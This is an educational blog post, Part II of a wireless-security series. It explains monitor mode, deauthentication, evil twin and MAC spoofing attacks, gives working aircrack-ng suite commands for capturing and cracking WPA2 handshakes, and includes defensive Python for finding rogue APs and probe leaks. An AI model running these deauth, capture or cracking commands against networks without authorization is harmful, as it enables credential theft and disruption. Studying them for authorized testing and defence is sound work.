Every concept, every tool, and every piece of hardware a wireless attacker uses — explained from scratch so you actually understand what you're doing

Series Overview

Part I — The Signal Never Lies → Foundation, protocols, how Wi-Fi actually works.

Part II — The Attacker's Arsenal → Current Article: Attack concepts, tools, hardware you need.

Part III — Break In, Own Everything → Live lab simulation, post-exploitation, real-world scenarios.

Part IV — Lock It Down or Lose It All → Defense, detection, incident response, the future of wireless security.

⚠️ Legal Disclaimer: This series is written strictly for cybersecurity education, ethical hacking training, and authorized penetration testing. Every technique and tool described in this blog must only be used on networks you own or have explicit written authorization to test. Unauthorized wireless testing is a criminal offense in virtually every jurisdiction worldwide. The author bears zero responsibility for misuse of this information.

What This Part Covers

Part I gave you the foundation — how 802.11 works, what a four-way handshake actually is, why WEP collapsed like a house of cards, and why WPA3's SAE handshake fundamentally changes the attack surface. If you haven't read Part I, go back. Everything in this part assumes that foundation.

Part II is where things get concrete.

This is the attacker's playbook. We are going to walk through every core attack concept in wireless security — not just what it does, but how it works mechanically at the packet level. Then we will break down every major tool in the wireless security toolkit, explaining what each one is actually doing under the hood rather than just listing commands. And finally, we will cover the hardware side: why your laptop's built-in Wi-Fi card is useless for security work, which chipsets and adapters professionals actually use, and what to look for when buying equipment.

By the end of Part II, you will understand the full picture from the attacker's perspective — the concepts, the tools, and the hardware that make wireless attacks possible. Part III takes all of this and runs it live in a lab.

Section 1: Core Attack Concepts

Before you touch a tool, you need to understand the building blocks. Every wireless attack is a combination of these core concepts. Master them here, and every tool will make immediate sense.

Concept 1: Monitor Mode — Becoming an Invisible Observer

This is where everything starts.

Your Wi-Fi adapter, by default, operates in what is called managed mode. In managed mode, your network card has one job: connect to your home or office network and transfer your data. It ignores every other packet floating through the air around it. Packets addressed to other devices? Discarded at the driver level before your operating system even sees them. Traffic from other networks? Never reaches you. It is like sitting in a crowded café and choosing to only listen to the one person you are talking to, filtering out everything else.

Monitor mode removes that filter entirely.

In monitor mode, your wireless adapter captures every single 802.11 frame it receives — regardless of destination MAC address, regardless of SSID, regardless of whether the network is encrypted or not, regardless of whether you are connected to anything. Your adapter becomes a passive radio receiver, silently recording everything in the air on the channel it is tuned to.

┌─────────────────────────────────────────────────────────────────┐
│                    MANAGED MODE vs MONITOR MODE                 │
├────────────────────────────┬────────────────────────────────────┤
│       MANAGED MODE         │          MONITOR MODE              │
│   (Normal Operation)       │    (Security Testing)              │
├────────────────────────────┼────────────────────────────────────┤
│ ✓ Connected to 1 network   │ ✓ Not connected to any network     │
│ ✗ Only sees own traffic    │ ✓ Captures ALL nearby 802.11 frames│
│ ✗ Ignores other networks   │ ✓ Sees all SSIDs and BSSIDs        │
│ ✗ Cannot inject packets    │ ✓ Can inject packets (with driver) │
│ ✓ Normal apps work fine    │ ✗ Cannot browse internet normally  │
│ ✗ Cannot capture handshake │ ✓ Captures WPA2 handshakes         │
│ ✗ No beacon analysis       │ ✓ Full management frame access     │
└────────────────────────────┴────────────────────────────────────┘

Monitor mode is the foundation of every passive wireless attack. Handshake capture? You need monitor mode. Scanning for rogue access points? Monitor mode. Seeing which devices are probing for which networks? Monitor mode. Without it, you are operating blind.

One important point that trips up beginners: monitor mode is a driver and chipset feature, not a universal capability. Most built-in laptop Wi-Fi adapters do not support monitor mode in their standard drivers. This is why specialized external adapters are required — we cover this in detail in Section 3.
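On Linux you do not have to guess whether a chipset supports monitor mode: `iw list` prints a "Supported interface modes" block per radio (each `Wiphy`). The following is an added example, not code from the page or from the aircrack-ng project; it parses a constructed excerpt of that output (the adapter names phy0/phy1 and the mode lists are invented for the sample) and reports which radios advertise monitor mode. Note that `iw list` says nothing about injection support, which is a driver matter and still has to be tested separately as the text describes.

```python
import re

# Constructed excerpt of `iw list` output for this example (invented adapter
# names; not captured from real hardware). phy0 advertises monitor mode,
# phy1 does not.
SAMPLE_IW_LIST = """\
Wiphy phy0
\tmax # scan SSIDs: 4
\tSupported interface modes:
\t\t * IBSS
\t\t * managed
\t\t * AP
\t\t * monitor
\tBand 1:
\t\tFrequencies:
\t\t\t* 2412 MHz [1] (20.0 dBm)
Wiphy phy1
\tSupported interface modes:
\t\t * managed
"""

def parse_interface_modes(iw_list_output: str) -> dict:
    """Map each Wiphy name to the set of interface modes it advertises.

    Modes are listed under 'Supported interface modes:' as ' * mode' lines;
    the block ends at the first following line that is not a ' * ' entry.
    """
    modes_by_phy = {}
    current_phy = None
    in_modes = False
    for line in iw_list_output.splitlines():
        if line.startswith("Wiphy "):
            current_phy = line.split()[1]
            modes_by_phy[current_phy] = set()
            in_modes = False
        elif line.strip() == "Supported interface modes:":
            in_modes = True
        elif in_modes:
            match = re.match(r"\s+\*\s+(\S+)", line)
            if match and current_phy is not None:
                modes_by_phy[current_phy].add(match.group(1))
            else:
                in_modes = False  # left the modes block
    return modes_by_phy

def monitor_capable_phys(iw_list_output: str) -> list:
    """Radios that can be switched into monitor mode (by airmon-ng or iw)."""
    return sorted(phy for phy, modes in parse_interface_modes(iw_list_output).items()
                  if "monitor" in modes)

if __name__ == "__main__":
    # On a real system: parse_interface_modes(subprocess.check_output(["iw", "list"], text=True))
    print("monitor-capable radios:", monitor_capable_phys(SAMPLE_IW_LIST))
```

On a live machine, feed the function the real output of `iw list` instead of the sample string; an adapter whose radio is absent from the result will not accept `airmon-ng start`, whatever the packaging claims.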

Concept 2: Packet Injection — Speaking the Network's Language

Monitor mode lets you listen. Packet injection lets you talk — but not in the normal way.

Standard Wi-Fi adapters in managed mode can only transmit packets that follow the normal 802.11 connection rules. You are associated to a network, and you send your traffic. Packet injection is different: it allows you to craft arbitrary 802.11 frames and inject them into the airspace, regardless of what network you are connected to, and without the frames needing to follow normal connection conventions.

This is what makes deauthentication attacks possible. You are not "connected" to the target network — you are injecting raw 802.11 management frames that the target devices will accept as legitimate, because those frames look exactly like frames from the real access point.

Not all adapters that support monitor mode also support packet injection. They are separate capabilities. Always test both with aireplay-ng -9 wlan0mon before assuming an adapter can perform active attacks.

Concept 3: Packet Sniffing — Reading the Air

Once you are in monitor mode, you are receiving every frame in range. Packet sniffing is the act of capturing and recording those frames for analysis.

On an open (unencrypted) network, sniffing is immediately devastating. Every HTTP request, DNS query, username, password, session cookie, and piece of form data transmitted without TLS is visible in plaintext. A coffee shop with an open guest network is a live demonstration of why "free Wi-Fi" without a VPN is a serious risk.

Open Network Sniffing — What an Attacker Sees
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Your device sends:                 Attacker captures:
──────────────────                 ──────────────────
GET /login HTTP/1.1       →        username=john
Host: bank.com                     password=Secr3t!
Content: user=john&pass=Secr3t!    session_token=eyJ0...
                                   full request/response

On an encrypted network (WPA2/WPA3), the payload of data frames is encrypted and unreadable without the key. But the attacker still captures:

  • MAC addresses of every device communicating (always visible, never encrypted)
  • SSID and BSSID of the network
  • Traffic volume and timing — useful for behavioral analysis
  • DNS queries if DNS is unencrypted (which it usually is by default)
  • EAPOL handshake frames — the primary target for WPA2 cracking
  • Probe requests — your device broadcasting the names of every saved Wi-Fi network

That last point is worth pausing on. When your phone has Wi-Fi on, it is constantly broadcasting probe requests on every channel asking "Is HomeNetwork here? Is CoffeeShop_WiFi here? Is CompanyOffice here?" Every network you have ever connected and saved is being advertised to anyone monitoring the airspace. This is a significant privacy leak — and it is happening right now, on your device, in every public space you enter.
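To make the size of that leak concrete, here is an added example (not code from the page) that takes a constructed probe-request log, the (station MAC, probed SSID) pairs a monitor-mode capture exposes, and turns it into the report a privacy auditor would want: which network names each device has disclosed, whether the device is at least using a randomized MAC (the locally-administered bit in the first octet, which is how operating systems mark software-set addresses), and which SSIDs are shared between devices. All MACs and SSIDs in the sample are invented.

```python
# Constructed probe-request log for this example: (station MAC, probed SSID)
# pairs as a monitor-mode capture would reveal them. An empty SSID is a
# wildcard probe, which names no network. 0xda has the locally-administered
# bit set, the marker modern OSes use for a randomized MAC.
PROBE_LOG = [
    ("00:11:22:33:44:55", "HomeNetwork"),
    ("00:11:22:33:44:55", "CoffeeShop_WiFi"),
    ("00:11:22:33:44:55", "CompanyOffice"),
    ("00:11:22:33:44:55", ""),
    ("a4:5e:60:00:00:01", "HomeNetwork"),
    ("da:a1:b2:c3:d4:e5", "AirportFree"),
]

def is_locally_administered(mac: str) -> bool:
    """Bit 1 of the first octet marks a locally administered (software-set)
    address; randomized MACs set it, burned-in vendor MACs do not."""
    return bool(int(mac.split(":")[0], 16) & 0x02)

def probe_report(records) -> dict:
    """Per station: whether its MAC looks randomized, and the sorted list of
    network names it has disclosed in directed probe requests."""
    report = {}
    for station, ssid in records:
        entry = report.setdefault(
            station, {"randomized_mac": is_locally_administered(station), "ssids": set()})
        if ssid:  # wildcard probes name nothing and are not a leak
            entry["ssids"].add(ssid)
    for entry in report.values():
        entry["ssids"] = sorted(entry["ssids"])
    return report

def attributable_leaks(records) -> dict:
    """Stations whose disclosed SSID list is tied to a stable hardware
    identity (non-randomized MAC): the worst case for the device owner,
    because the same MAC will show up again in the next capture."""
    return {station: entry["ssids"] for station, entry in probe_report(records).items()
            if entry["ssids"] and not entry["randomized_mac"]}

def shared_networks(records) -> dict:
    """SSIDs probed by more than one station. Two devices that both know
    'HomeNetwork' are almost certainly carried by the same people."""
    stations_by_ssid = {}
    for station, ssid in records:
        if ssid:
            stations_by_ssid.setdefault(ssid, set()).add(station)
    return {ssid: sorted(stations) for ssid, stations in stations_by_ssid.items()
            if len(stations) > 1}

if __name__ == "__main__":
    for station, entry in probe_report(PROBE_LOG).items():
        tag = "randomized" if entry["randomized_mac"] else "hardware MAC"
        print(f"{station} ({tag}) disclosed: {entry['ssids']}")
    print("shared:", shared_networks(PROBE_LOG))
```

Two things the report makes obvious: MAC randomization hides who is asking but not what they are asking for, and the only real fix on the client side is to forget networks you no longer use and to stop devices from probing for them by name (most current operating systems only send directed probes for networks marked hidden).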

Concept 4: The WPA2 Handshake Capture — The Attacker's Prize

We covered the four-way handshake in detail in Part I. From the attacker's perspective, here is what the capture objective looks like operationally:

The attacker needs to capture the four EAPOL frames that are exchanged when a client connects to the access point. These frames contain the cryptographic material needed for an offline dictionary attack: the ANonce, SNonce, and — most critically — the MIC (Message Integrity Code) that encodes proof of the correct password.

HANDSHAKE CAPTURE — ATTACKER'S VIEW
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
WHAT THE ATTACKER CAPTURES:
┌──────────────┐   EAPOL 1   ┌──────────────┐
│ Access Point │ ──────────> │    Client    │  ← ANonce captured
│ (Target AP)  │             │  (Victim)    │
│              │ <────────── │              │  ← SNonce + MIC captured ★
│              │   EAPOL 2   │              │
│              │ ──────────> │              │  ← GTK captured
│              │   EAPOL 3   │              │
│              │ <────────── │              │  ← ACK captured
└──────────────┘   EAPOL 4   └──────────────┘
        ATTACKER (monitoring in the background)
        ┌─────────────────────────────────┐
        │  Silently captures all 4 frames │
        │  Takes them offline             │
        │  Runs dictionary attack         │
        │  No further network contact     │
        └─────────────────────────────────┘
★ EAPOL 2 contains the MIC — this is the critical frame.
  With EAPOL 1 + EAPOL 2, the attacker has everything needed
  to crack the password offline.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Two methods to get this handshake:

Passive capture: Simply wait and monitor. When any client connects to the target AP (during normal business hours, this happens constantly), the handshake is captured automatically. No interaction with the network required. Zero footprint.

Active capture via deauthentication: Force a currently connected client to disconnect by sending spoofed Deauthentication frames. The client automatically reconnects within seconds, generating a fresh handshake. Leaves evidence of the Deauth attack, but is faster and works at any time of day. We cover this in the next concept.

Concept 5: The Deauthentication Attack — Pulling the Plug Remotely

This is one of the most important and widely used attack techniques in wireless security. It is also deceptively simple to understand once you remember one fact from Part I:

WPA2 management frames are not authenticated.

A Deauthentication frame is a management frame that either a client or an access point can send to formally terminate a connection. On a normal network, an AP sends a Deauth to a client when the client is being disconnected due to inactivity, a firmware restart, a configuration change, or similar reasons. The client sends one back when it is intentionally disconnecting (shutting down, switching networks).

Here is the attack: anyone can send a forged Deauthentication frame claiming to be from anyone. If you craft a Deauth frame with the AP's MAC address as the source and a client's MAC address as the destination, and inject it into the airspace — the client receives it, believes it is from the AP, and immediately disconnects. The client has absolutely no mechanism to verify whether that frame actually came from the AP.

DEAUTHENTICATION ATTACK FLOW
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
NORMAL SCENARIO:           ATTACK SCENARIO:
                           
[AP] ──(deauth)──> [Client]    [ATTACKER] ──(FORGED deauth)──> [Client]
                               Source MAC = AP's BSSID (SPOOFED)
Client accepts it.             Client cannot verify the source.
Session ends.                  Client accepts it. Session ends.
RESULT:
Client disconnects from legitimate AP.
Client automatically tries to reconnect.
Reconnection generates a fresh WPA2 handshake.
Attacker's airodump-ng captures the handshake.
USES:
① Capture WPA2 handshake (for offline cracking)
② Denial of service (send continuously)
③ Force clients onto attacker's Evil Twin AP
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

This attack is trivially executed with aireplay-ng and takes less than ten seconds from start to handshake capture when a client is present. The tool, the network, and the client do not need to know each other — just proximity and the right adapter.

Why WPA3 defeats this: WPA3 mandates Management Frame Protection (802.11w). Deauthentication frames must now be cryptographically signed by a party that holds the session key. A forged Deauth from an attacker who is not on the network carries no valid signature and is rejected by the receiving device.

Concept 6: Rogue Access Points — The Unauthorized Door

A rogue access point is any wireless AP that has not been authorized to operate on a network, appearing where it should not be.

There are two distinct categories with very different attack scenarios:

The Insider Rogue AP:

An employee plugs a cheap consumer router into a corporate network jack under their desk for personal convenience — maybe they want better Wi-Fi signal for their phone. That device is now broadcasting a wireless network connected directly to the internal corporate network. It may have WPS enabled with a default PIN. It may be using WPA2 with the default password written on the bottom of the router. It may have remote management enabled.

From outside the building, an attacker with a directional antenna scanning for Wi-Fi networks detects an AP with a consumer router SSID like "NETGEAR-2A4F" broadcasting from what is clearly a corporate building. This device was never provisioned by IT, never patched, never configured for security. It is an unauthorized door into the corporate network.

The External Attacker's Rogue AP:

An attacker deploys their own AP — a laptop running hostapd, or a dedicated hardware device — and connects it to the target network via a network drop or Ethernet port they have brief physical access to. This provides persistent wireless access to the internal network even after the attacker leaves the premises.

Both types are detected by enterprise WIDS/WIPS solutions (covered in Part IV) through constant monitoring for unauthorized BSSIDs on the corporate SSID or on wired network segments.

Concept 7: The Evil Twin Attack — The Wireless Impersonation

The Evil Twin is one of the most conceptually clean and practically effective attacks in wireless security. It requires no cryptography, no cracking, and it defeats WPA2 networks with arbitrarily strong passwords — because it attacks the human, not the protocol.

EVIL TWIN ATTACK — HOW IT WORKS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
LEGITIMATE NETWORK:                   ATTACKER'S EVIL TWIN:
┌─────────────────────┐              ┌─────────────────────┐
│  SSID: CorpWiFi     │              │  SSID: CorpWiFi     │  ← same name
│  BSSID: AA:BB:CC... │              │  BSSID: 11:22:33... │  ← different MAC
│  Channel: 6         │              │  Channel: 11        │  ← diff channel
│  Signal: Medium     │              │  Signal: STRONG ★   │  ← boosted signal
└─────────────────────┘              └─────────────────────┘
★ Attacker boosts signal on Evil Twin OR sends deauth frames
  to kick clients off the real AP.
VICTIM'S DEVICE:
"I know CorpWiFi. I see two of them. I'll pick the stronger one."
→ Connects to Evil Twin.
ATTACKER NOW:
① Presents fake "verify your Wi-Fi password" captive portal
② User enters WPA2 password (social engineering)
③ Attacker checks password against captured handshake
④ Password harvested. Attack complete.
OR (without social engineering):
① Victim is connected to Evil Twin
② Attacker performs MitM on all victim traffic
③ All HTTP traffic, DNS, credentials are captured in real time
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

The Evil Twin attack is particularly powerful in environments with multiple APs broadcasting the same SSID — which is exactly how enterprise Wi-Fi is designed. Users and devices are conditioned to connect to any AP broadcasting the right SSID, which is exactly what the Evil Twin exploits.

Tools like Fluxion (covered below) fully automate this attack, including the deauth component, the captive portal, and automatic password verification.

Concept 8: MAC Address Spoofing — Wearing Someone Else's Identity

Every 802.11 frame contains a source MAC address and a destination MAC address in the header. These are never encrypted — they are always visible in plaintext in every frame, even on WPA2 and WPA3 networks.

MAC addresses are 48-bit hardware identifiers assigned to every network interface. They are supposed to be globally unique, assigned by the manufacturer, and burned into the hardware. In reality, they are trivially changed in software on every major operating system:

# Linux — change MAC address to anything you want
sudo ip link set wlan0 down
sudo ip link set wlan0 address AA:BB:CC:DD:EE:FF
sudo ip link set wlan0 up

This takes two seconds and survives until the next reboot.

Why this matters for attackers:

Bypassing MAC filtering: Some networks use MAC address filtering — maintaining a whitelist of approved device MACs and rejecting all others. Since MAC addresses are always visible in 802.11 frames, an attacker monitors the target network, identifies an authorized device's MAC, waits for that device to disconnect, then spoofs its MAC and connects. MAC filtering provides zero meaningful security against any attacker with basic tools.

Spoofing management frames: When the attacker sends deauthentication frames, they set the source MAC to the AP's BSSID. The receiving client sees a frame that appears to originate from its own access point. Without management frame protection, the client cannot distinguish a real Deauth from a spoofed one.

Anonymizing the attacker: Running airodump-ng for passive reconnaissance leaves no footprint, but active attacks (packet injection) do transmit frames with source MAC addresses. Spoofing the attacker's MAC to a random value or to a legitimate device's MAC complicates attribution.

Concept 9: Signal Jamming — The Nuclear Option

RF jamming broadcasts strong interference on the same frequencies used by Wi-Fi, drowning out legitimate communications and creating a denial of service at the physical layer. Devices within range cannot communicate through the noise.

We mention this concept for completeness, but with a very firm note:

RF jamming is illegal in virtually every jurisdiction, with no exceptions for testing on your own networks. In the US, the FCC prohibits jamming under 47 U.S.C. § 333, period. No "but it's my own network" exception exists. The fines are significant and the FCC actively investigates jamming complaints.

Legitimate security testing does not involve RF jamming. If a security assessment requires demonstrating denial of service against a wireless network, that is documented and achieved via software-layer deauthentication floods, not hardware jammers.

Section 2: The Complete Wireless Attack Tool Arsenal

Understanding the concepts is the foundation. Now let's walk through the tools that implement those concepts. For each tool, we cover what it does, how it works internally, and when you use it.

Tool 1: The Aircrack-ng Suite — The Complete Wireless Audit Toolkit

Aircrack-ng is not a single program. It is a suite of four core tools (and several supporting utilities) that together cover the entire wireless attack workflow: enabling monitor mode, scanning and capturing, injecting frames, and cracking passwords. It is the foundation of wireless security work on Linux.

Every tool in the suite operates on a monitor-mode wireless interface (wlan0mon by convention).

airmon-ng — The Mode Switcher

airmon-ng manages the wireless adapter's operating mode. Its job is to convert your adapter from managed mode (normal) to monitor mode (security testing) and back.

AIRMON-NG WORKFLOW
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Step 1: Kill interfering processes
────────────────────────────────────
$ sudo airmon-ng check kill
  WHY: NetworkManager and wpa_supplicant hold exclusive
  control of wireless interfaces. They must be stopped
  before monitor mode can be enabled.
  WHAT GETS KILLED: NetworkManager, wpa_supplicant,
  dhclient, and any other process holding the interface.
  Your machine loses its internet connection temporarily.
Step 2: Enable monitor mode
────────────────────────────────────
$ sudo airmon-ng start wlan0
  OUTPUT:
  PHY     Interface   Driver      Chipset
  phy0    wlan0       ath9k_htc   Atheros AR9271
  (mac80211 monitor mode vif enabled for [phy0]wlan0
  on [phy0]wlan0mon)
  RESULT: A new virtual interface wlan0mon is created
  in monitor mode. The original wlan0 may disappear
  or become inactive.
Step 3: Verify
────────────────────────────────────
$ iwconfig wlan0mon
  wlan0mon  IEEE 802.11  Mode:Monitor  ...
Step 4: When finished, restore normal operation
────────────────────────────────────
$ sudo airmon-ng stop wlan0mon
$ sudo systemctl start NetworkManager
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Under the hood: airmon-ng calls the iw and ip Linux utilities to reconfigure the wireless interface's mode via the mac80211 kernel subsystem. The new wlan0mon interface is a virtual monitor-mode interface layered on top of the physical hardware interface. All subsequent tools in the suite write to and read from this virtual interface.

airodump-ng — The Eyes and Ears

airodump-ng is the most commonly used tool in the suite. It is a wireless packet capture and network scanner. When you want to know what networks exist, what clients are connected to them, and you want to capture handshakes — this is the tool.

AIRODUMP-NG OUTPUT EXPLAINED
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
$ sudo airodump-ng wlan0mon
 CH  7 ][ Elapsed: 24 s ][ 2024-09-15 14:32 ][ WPA handshake: AA:BB:CC:DD:EE:FF
 BSSID              PWR  Beacons  #Data  #/s  CH   MB   ENC   CIPHER  AUTH  ESSID
 AA:BB:CC:DD:EE:FF  -45      487    234   12   6  130   WPA2  CCMP    PSK   CorpWiFi
 11:22:33:44:55:66  -72      103      0    0  11   54   WPA2  CCMP    PSK   HomeNetwork
 77:88:99:AA:BB:CC  -81       89      0    0   1  130   OPN               GuestWiFi

 BSSID              STATION            PWR   Rate  Lost  Frames  Notes  Probes
 AA:BB:CC:DD:EE:FF  DE:AD:BE:EF:CA:FE  -52   54-54   0     876          CorpWiFi
 (not associated)   12:34:56:78:9A:BC  -65    0- 1   0      14          HomeNetwork,CoffeeShop
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
COLUMN GUIDE:
BSSID  → Access point MAC address
PWR    → Signal strength in dBm (closer to 0 = stronger)
#Data  → Number of data frames captured (higher = more traffic)
CH     → Operating channel
ENC    → Encryption (WPA2, WPA, WEP, OPN = open)
CIPHER → CCMP (AES) or TKIP (RC4)
AUTH   → PSK (personal) or MGT (enterprise/802.1X)
ESSID  → Network name (SSID)
STATION section shows connected clients.
"not associated" clients are probing for saved networks.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Targeted capture mode — locking to one specific network:

sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# -c 6        → lock to channel 6 (no more channel hopping)
# --bssid     → filter to only this access point
# -w capture  → write to files: capture-01.cap (raw frames)
#                               capture-01.csv (summary)
#                               capture-01.kismet.csv

When a WPA2 four-way handshake is captured, the top-right corner of the display updates to:

WPA handshake: AA:BB:CC:DD:EE:FF

This is the green light. The capture file now contains everything needed for offline cracking.

What airodump-ng does internally: It puts the adapter into receive-only mode on the specified channel and reads every raw 802.11 frame via the pcap library, filtering by BSSID if specified. EAPOL frames (the WPA handshake) are identified by EtherType 0x888E and stored separately for the cracking workflow. Management frames are decoded and displayed in the UI.
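The capture-01.csv summary that `-w` writes is also the quickest raw material for the defensive side of Concepts 6 and 7: compare every BSSID beaconing your SSID against the inventory of APs you actually deployed. The following is an added example, not code from the page or from the aircrack-ng project. It parses a constructed CSV in the layout airodump-ng writes (the parser keys on the header row rather than fixed positions, so check it against your version's header if the columns differ), flags any unauthorized BSSID carrying the protected SSID as an Evil Twin candidate, and lists which stations have attached to it. All BSSIDs, station MACs and timestamps in the sample are invented.

```python
import csv

# Constructed sample in the layout airodump-ng writes to capture-01.csv
# (values invented for this example). 11:22:33:44:55:66 is an open AP
# beaconing the corporate SSID on a different channel with a stronger
# signal: an Evil Twin candidate, with one station already attached to it.
SAMPLE_AIRODUMP_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:FF, 2024-09-15 14:31:48, 2024-09-15 14:32:12,  6, 130, WPA2, CCMP, PSK, -45, 487, 0, 0.  0.  0.  0,  8, CorpWiFi, 
11:22:33:44:55:66, 2024-09-15 14:31:50, 2024-09-15 14:32:12, 11,  54, OPN ,     ,    , -38, 310, 0, 0.  0.  0.  0,  8, CorpWiFi, 
77:88:99:AA:BB:CC, 2024-09-15 14:31:52, 2024-09-15 14:32:10,  1, 130, WPA2, CCMP, PSK, -81,  89, 0, 0.  0.  0.  0, 11, HomeNetwork, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:CA:FE, 2024-09-15 14:31:49, 2024-09-15 14:32:12, -52, 876, AA:BB:CC:DD:EE:FF, CorpWiFi
CA:FE:00:00:00:01, 2024-09-15 14:31:58, 2024-09-15 14:32:11, -40, 120, 11:22:33:44:55:66, CorpWiFi
12:34:56:78:9A:BC, 2024-09-15 14:31:55, 2024-09-15 14:32:01, -65,  14, (not associated), HomeNetwork,CoffeeShop
"""

def parse_airodump_csv(text: str):
    """Split the file into its AP and station sections (separated by a blank
    line) and return each as a list of dicts keyed by the stripped header names."""
    sections, current = [], []
    for line in text.splitlines():
        if line.strip():
            current.append(line)
        elif current:
            sections.append(current)
            current = []
    if current:
        sections.append(current)
    parsed = []
    for block in sections:
        rows = list(csv.reader(block))
        header = [h.strip() for h in rows[0]]
        records = []
        for row in rows[1:]:
            if len(row) > len(header):
                # the last column ('Probed ESSIDs') is itself comma-separated
                row = row[:len(header) - 1] + [",".join(row[len(header) - 1:])]
            records.append({h: v.strip() for h, v in zip(header, row)})
        parsed.append(records)
    aps = parsed[0] if parsed else []
    stations = parsed[1] if len(parsed) > 1 else []
    return aps, stations

def find_rogue_aps(aps, protected_ssid: str, authorized_bssids) -> list:
    """Every BSSID beaconing the protected SSID that is not in the inventory
    is a rogue / Evil Twin candidate. An open (OPN) twin of a WPA2 network is
    the captive-portal variant described in Concept 7."""
    authorized = {b.upper() for b in authorized_bssids}
    findings = []
    for ap in aps:
        if ap["ESSID"] != protected_ssid or ap["BSSID"].upper() in authorized:
            continue
        findings.append({
            "bssid": ap["BSSID"],
            "channel": int(ap["channel"]),
            "privacy": ap["Privacy"],
            "power_dbm": int(ap["Power"]),
            "open_network": ap["Privacy"] == "OPN",
        })
    return findings

def clients_of(stations, bssid: str) -> list:
    """Station MACs associated to a BSSID: which of our devices joined the twin?"""
    return sorted(s["Station MAC"] for s in stations if s["BSSID"].upper() == bssid.upper())

if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_AIRODUMP_CSV)
    for rogue in find_rogue_aps(aps, "CorpWiFi", ["AA:BB:CC:DD:EE:FF"]):
        print(f"rogue {rogue['bssid']} ch{rogue['channel']} {rogue['privacy']} "
              f"{rogue['power_dbm']} dBm, clients: {clients_of(stations, rogue['bssid'])}")
```

Run periodically against a sensor's CSV output, this is the core of what a WIDS does for the "same SSID, unknown BSSID" case; the inventory of authorized BSSIDs has to come from your controller or asset list, never from a previous scan.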

aireplay-ng — The Injector

aireplay-ng is the active attack tool. Where airodump-ng only listens, aireplay-ng injects 802.11 frames. Its most important capability for WPA2 testing is the deauthentication attack.

AIREPLAY-NG ATTACK MODES
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
ATTACK 0: Deauthentication (most commonly used)
──────────────────────────────────────────────────
$ sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c DE:AD:BE:EF:CA:FE wlan0mon
  -0 5            → send 5 deauth frames
  -a AA:BB:...    → target AP BSSID
  -c DE:AD:...    → target client MAC (omit to deauth ALL clients)
  WHAT HAPPENS: 5 Deauth frames are injected with source=AP BSSID,
  dest=Client MAC. Client disconnects and reconnects. Handshake captured.
ATTACK 1: Fake Authentication
──────────────────────────────────────────────────
$ sudo aireplay-ng -1 0 -e TargetSSID -a AA:BB:CC:DD:EE:FF wlan0mon
  Associates attacker's adapter with the target AP.
  Required for WEP ARP replay attacks.
  Tells the AP "I'm a client so accept my injected packets."
ATTACK 3: ARP Request Replay (WEP only)
──────────────────────────────────────────────────
$ sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF wlan0mon
  Captures ARP packets and replays them to generate
  new IVs rapidly. Used to accelerate WEP cracking.
  Generates 100,000+ IVs per minute on active networks.
ATTACK 9: Injection Test
──────────────────────────────────────────────────
$ sudo aireplay-ng -9 wlan0mon
  Tests whether adapter supports packet injection.
  ALWAYS run this before active attacks to confirm
  your hardware is working.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Under the hood: aireplay-ng crafts raw 802.11 frames using libpcap and injects them via the wireless driver's raw injection API. For deauthentication, it builds an 802.11 management frame with:

  • Frame Control: Type=0 (Management), Subtype=12 (Deauthentication)
  • Address 1 (destination): Client MAC
  • Address 2 (source): AP BSSID (spoofed)
  • Address 3 (BSSID): AP BSSID
  • Reason Code: 7 (Class 3 frame received from nonassociated STA)

The reason code is present but the receiving device does not verify that the reason code is legitimate or that the source actually sent it.

aircrack-ng — The Cracking Engine

aircrack-ng is the final stage of the WPA2 attack workflow. It takes the captured handshake file and a wordlist and performs an offline dictionary attack.

AIRCRACK-NG WPA2 CRACKING
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
$ sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt \
                   -b AA:BB:CC:DD:EE:FF \
                   capture-01.cap
  -w  → wordlist file path
  -b  → BSSID of target AP (to select correct handshake)
  capture-01.cap → packet capture containing handshake
OUTPUT (in progress):
  [00:01:42] 1,847,293 keys tested (18,234.12 k/s)
  Current passphrase: password12
OUTPUT (success):
  KEY FOUND! [ CompanyWiFi2024 ]
  Master Key     : A1 B2 C3 D4 E5 F6 ...
  Transient Key  : 11 22 33 44 55 66 ...
  EAPOL HMAC     : AA BB CC DD ...
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
